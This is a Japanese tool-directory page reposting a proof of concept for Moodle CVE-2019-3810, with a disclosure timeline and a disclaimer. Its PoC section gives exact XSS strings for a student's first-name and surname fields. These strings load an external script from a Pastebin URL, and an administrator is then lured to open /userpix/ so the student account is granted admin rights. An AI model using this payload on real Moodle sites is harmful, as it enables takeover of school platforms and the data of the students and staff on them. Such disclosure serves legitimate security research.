Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Moodle-CVE-2019-3810 — Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) 権限昇格(学生から管理者)のためのXSS PoC | Kitploit
ツール/GitHubGitHub/farisv/moodle-cve-2019-3810
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubfarisv/moodle-cve-2019-3810

Moodle-CVE-2019-3810

Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) 権限昇格(学生から管理者)のためのXSS PoC

リポジトリを見る
17215年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Moodle CVE-2019-3810

Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC for Privilege Escalation (Student to Admin). これは、私が過去に学術機関でのペネトレーションテスト中に発見したバグの一つです。当時、この単純なバグ一つで実質的に管理者アクセスを盗み、Moodleを完全に制御することができました。

git historyからわかるように、このバグはMoodleの旧バージョン(2003年)から存在し、2019年に修正されました。

タイムライン:

  • 2018年12月 - Moodleにバグを報告
  • 2019年1月 - パッチリリース
  • 2021年4月 - PoC公開

警告

教育目的のみ。違法行為にこのエクスプロイトを使用しないでください。作者は誤用や損害に対する責任を負いません。

PoC

  1. payload.jsをPastebinまたは類似のサービスにアップロードします。useridの値を自分のIDに変更します。URLがhttps://pastebin.com/raw/xxxxxxxxだとします。
  2. 学生アカウントにログインします。
  3. 名(first name)を" style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElementに設定します。
  4. 姓(surname)を('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')に設定します。
  5. 管理者に/userpix/ページを開くように依頼するか、自分の投稿にそのページへのリンクを貼り、待ちます。

成功すると、あなたのアカウントが管理者として追加されます。

デモ動画

ツールをダウンロード